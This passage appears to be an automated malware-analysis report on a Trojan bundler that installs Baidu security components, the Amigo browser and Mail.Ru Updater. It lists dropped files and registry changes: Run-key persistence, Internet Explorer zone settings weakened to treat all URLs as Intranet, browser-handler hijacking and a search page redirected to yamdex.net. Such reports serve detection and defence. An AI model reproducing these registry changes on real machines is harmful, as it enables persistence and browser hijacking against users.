%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\app.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDShellExt.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\NetService.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKVMainFrame.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\DesktopToast.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BavFrame.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKVDeskBand64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMFrameWork.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMSkin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\placeholder_tmp (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x86 (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x86\bd0001.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\KavUpdate.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\DllInject.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\Repair_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMAVEng.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMSDWrench.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BavScanS.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\ad.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduSdUProxy64.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduSdBugRpt.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\vatl.msi (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\uninst.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\900.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\iexplore.exe.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\bd0003.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\tips.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\InstallCfg.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\directui license.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\DriverManager.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduHipsIU.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKVVirusPlugins.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\TrayPluginContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMUpdate.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x64\bd0002.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMBase.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduSdUpdate.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDCooly.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\hips_customer.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMPerfMon.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\GCCommunicate.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\WebMonHook.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\BDMSkin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKVTrayTipsPlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKVDeskBand.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\hips_self_enc.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\res (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduSdTray.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\dl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\KVRtp_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\Cooly_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BavScanV.dll (0 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\dl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\bddownloader.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\systemfile.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDDriverFixer.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\806.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\CompatibilityChecker.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\monitor_config.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\updlog.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\7z.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMTinyXml.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\bduf.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\duilib license.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BavCommon.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\tuopan.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\user_trusted_list.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMSREng.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\bd0002.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKVWsc.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\bd0001.dll (0 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\7z.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\804.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\PrivacyProtect.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\809.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduHipsBugRpt.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\bd0001.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\SysFixerXMLScript.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\FileMon.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMPatchAgent.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\RtpContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\HIPSClient.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\wverify.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\white_list.dat (0 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\bdcomproxy.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x64\bd0001.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\KVMainframePluginContainerConfig.xml (0 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\vatl.msi (0 bytes)
Registry activity
The process taskkill.exe:1744 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 F4 F3 CD 2C C0 27 B5 24 5E 2C 7B A9 FA 95 DF"
The process taskkill.exe:332 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 48 09 BA 65 FA 69 6F 0D 82 3B 6E BB 7A 38 56"
The process regsvr32.exe:2516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "61 1A 26 F7 A4 57 CC 02 08 74 5F B0 9A 60 69 44"
[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}]
"(Default)" = "IDownloader_2"
[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\InProcServer32]
"ThreadingModel" = "Both"
[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "PSFactoryBuffer"
[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}\ProxyStubClsid32]
"(Default)" = "{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}"
[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\InProcServer32]
"(Default)" = "%Program Files%\Common Files\Baidu\BDDownload\108\bdcomproxy.dll"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "IDownloader"
[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}\NumMethods]
"(Default)" = "6"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\NumMethods]
"(Default)" = "15"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid32]
"(Default)" = "{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}"
The process regsvr32.exe:3188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3C 15 D4 E0 F6 73 D9 83 D7 72 E0 B3 66 52 02 6C"
[HKCR\CLSID\{85E0B1AA-04FA-11D1-B7DA-00A0C90348D6}\InprocServer32]
"(Default)" = "%Program Files%\Baidu\BaiduSd\2.1.0.3086\BDKVDeskBand.dll"
"ThreadingModel" = "Apartment"
[HKCR\CLSID\{85E0B1AA-04FA-11D1-B7DA-00A0C90348D6}]
"(Default)" = "U盘防护"
The process amigo.exe:1768 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Classes\ftp\shell\open\ddeexec]
"(Default)" = ""
[HKCU\Software\Classes\.html]
"(Default)" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Classes\ftp\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe,0"
[HKCU\Software\Classes\https\shell]
"(Default)" = "open"
[HKCU\Software\Classes\.shtml]
"(Default)" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Classes\ftp\shell]
"(Default)" = "open"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Classes\http\shell]
"(Default)" = "open"
[HKCU\Software\Classes\http\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe,0"
[HKCU\Software\Classes\http]
"URL Protocol" = ""
[HKCU\Software\Classes\https]
"URL Protocol" = ""
[HKCU\Software\Classes\ftp\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe -- %1"
[HKCU\Software\Classes\https\shell\open\ddeexec]
"(Default)" = ""
[HKCU\Software\Classes\.xhtml]
"(Default)" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Classes\.xht]
"(Default)" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Classes\.htm]
"(Default)" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 65 2A 03 EF CC 78 C9 84 AA 92 22 0F 0B 7C AF"
[HKCU\Software\Amigo]
"usagestats" = "0"
[HKCU\Software\Classes\http\shell\open\ddeexec]
"(Default)" = ""
[HKCU\Software\Classes\ftp]
"URL Protocol" = ""
[HKCU\Software\Classes\https\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe,0"
[HKCU\Software\Clients\StartmenuInternet]
"(Default)" = "Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Classes\https\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe -- %1"
[HKCU\Software\Classes\http\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe -- %1"
The process MailRuUpdater.exe:2192 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\MailRuUpdater]
"Publisher" = "Mail.Ru"
"InstallLocation" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe"
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe uninstall"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\MailRuUpdater]
"DisplayName" = "áûуöñð ðòтþüðтøчõÑÂÂúþóþ þñýþòûõýøѠÿрþóрðüü"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\MailRuUpdater]
"VersionMinor" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\MailRuUpdater]
"VersionMajor" = "1"
"DisplayIcon" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru]
"MailRuUpdater.exe" = "Mail.Ru updater"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CE 4D 09 28 9B 2F B5 C0 91 2B 7B 91 EE 99 E9 59"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"LangID" = "09 04"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MailRuUpdater" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\MailRuUpdater]
The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MailRuUpdater"
The process MailRuUpdater.exe:2368 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C7 DC F0 05 DF 2C 30 0A 66 9D 62 91 B0 9D 13 6A"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Mail.Ru\IE_Bar\Settings]
"Guid" = "{BDEE9378-6BD9-4C2E-BA1E-68ACEE391ADD}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Mail.Ru\Updater]
"IconsConvertation" = "1"
[HKCU\Software\Mail.Ru\Tech\ptls\{A12C4AB1-F4D0-4771-8C21-613E9D12491F}\ch]
"gdup" = "LlyYT03/qx vUgo0O6evFTcBnV5X6pcJog1NZ2f/v11XfPY/b8ecM5s5dVIbkY9lVX/ IFbdi2fccSAWGIGIcC8Pjl9O6upf8F8GMz2Ur0VaSNgCH4fpX/lPPzQ8tf8dU3/2LifEmm7SfzxUQ8nPOwd56z4NiMl zmhiXB2JiGKo9A=="
The process BDKVWsc.exe:2572 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C6 4C C3 EC 1A F8 08 92 B3 C0 BE 84 6D 61 86 81"
The process id1 - 34.exe:504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"NetHood" = "%Documents and Settings%\%current user%\NetHood"
"Fonts" = "%WinDir%\Fonts"
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"PrintHood" = "%Documents and Settings%\%current user%\PrintHood"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"setup.exe" = "baidu Setup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Administrative Tools" = "%Documents and Settings%\All Users\Start Menu\Programs\Administrative Tools"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Templates" = "%Documents and Settings%\All Users\Templates"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Administrative Tools" = ""
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"SendTo" = "%Documents and Settings%\%current user%\SendTo"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 EA 4F A6 A2 0E D1 73 97 F6 68 E4 0D 19 3F CD"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CD Burning" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\CD Burning"
"Recent" = "%Documents and Settings%\%current user%\Recent"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process %original file name%.exe:928 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B 7C 77 B8 26 5D 3F 54 FD 81 28 CA A8 0F 88 D5"
The process %original file name%.exe:1504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKCU\Software\IM]
"HomePage" = "14-12-11 1:57:46"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Search Page" = "http://yamdex.net/?searchid=1&l10n=ru&fromsearch=1&imsid=809ae869fb7d3446ed13503ac7f7313b&text={searchTerms}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{C1E685B2-3E0A-4D74-9161-D1B5BBD4B5FD}]
"AmigoDistrib.exe" = "Amigo"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\9e913b6133dc02e55a5a01a69b184321\DEBUG]
"Trace Level" = ""
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\IM\shortcuts]
"QzpcRG9jdW1lbnRzIGFuZCBTZXR0aW5nc1xhZG1cQXBwbGljYXRpb24gRGF0YVxNaWNyb3NvZnRcSW50ZXJuZXQgRXhwbG9yZXJcUXVpY2sgTGF1bmNoXEFtaWdvLmxuaw==" = ""
